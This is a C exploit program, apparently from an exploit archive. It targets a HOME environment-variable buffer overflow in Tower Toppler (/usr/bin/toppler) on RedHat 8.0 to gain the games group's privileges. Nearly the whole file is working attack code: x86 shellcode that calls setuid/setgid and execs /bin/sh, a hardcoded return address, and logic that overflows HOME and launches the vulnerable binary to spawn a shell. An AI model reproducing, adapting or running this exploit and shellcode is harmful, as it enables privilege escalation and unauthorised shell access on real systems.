Local exploit that yields gid of games for /usr/bin/toppler. Tested against RedHat 8.0.
c92cab560b62bccb2088bbd7e1ee2b423795fe4783101d37181185d7c3dbad96
/*
* /usr/bin/topper local exploit
* vul <= topper 0.96
* bug: http://www.securityfocus.com/bid/8132
*
* coded by nic
* Ps: i have see another ex,but it have many nops. ^^:)
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>
#define me "tiger"
static char shellcode[] =
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x2e"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x01"
"\xcd\x80";
struct target {
int index;
char *distro;
char *dest;
char *name;
u_long retaddr;
int LEN;
};
struct target exploit[] = {
{ 1, "redhat 8.0 -", "/usr/bin/toppler",
"toppler", 0xbffff9f8, 256 },
{ 0, NULL, NULL, NULL, 0, 0 }
};
void usage(char *cmd);
int main(int argc, char **argv)
{
int i;
int type;
int size;
int options;
long retaddr;
char buffer[256];
if(argc == 1) {
usage(argv[0]);
exit(0);
}
/* options of this exploit */
while((options = getopt(argc, argv, "ht:")) != EOF) {
switch(options) {
case 'h':
usage(argv[0]);
exit(0);
case 't':
type = atoi(optarg);
if (type > 3 || type < 0) {
printf("Out of range!!\n");
exit(0);
}
if (type == 0) {
usage(argv[0]);
printf("num . description\n"
"----+----------------------------------------\n");
for (i = 0; exploit[i].dest; i++)
fprintf(stderr, "[%d] | %s %s\n", exploit[i].index, exploit[i].distro, exploit[i].dest);
exit(1);
}
break;
default:
usage(argv[0]);
exit(0);
}
}
size = exploit[type-1].LEN;
retaddr = exploit[type-1].retaddr;
fprintf(stderr, "\n--- nic-fuckex "me" - Tower Toppler HOME env buf overflow ex---\n"
"[+] by: nic\n"
"[+] nic-2003 - http://www.0x333.org/\n"
"[+] attacking: %s\n"
"[+] using ret: 0x%8lx\n"
"[+] spawning shell\n", exploit[type-1].dest, retaddr);
for (i = 0; i < size; i += 4)
*(long *)&buffer[i] = retaddr;
memcpy(buffer + 1, shellcode, strlen(shellcode));
setenv("HOME", buffer, 1); /* seting env variable */
if ( (execl(exploit[type-1].dest, exploit[type-1].name, NULL)) == -1) {
fprintf(stderr, "Try another target, you scriptkid!\n\n");
exit(-1);
}
return(0);
}
void usage(char *cmd)
{
fprintf(stderr, "\n--- nic-fuckex "me" - Tower Toppler HOME env buff overflow ex--\n"
"by nic \n"
"nic-2003 - http://www.0x333.org/\n\n"
"usage: %s [-h] [-t <num>]\n"
"__options\n"
" -h\t- this help\n"
" -t num\t- choose target (0 for list)\n\n", cmd);
}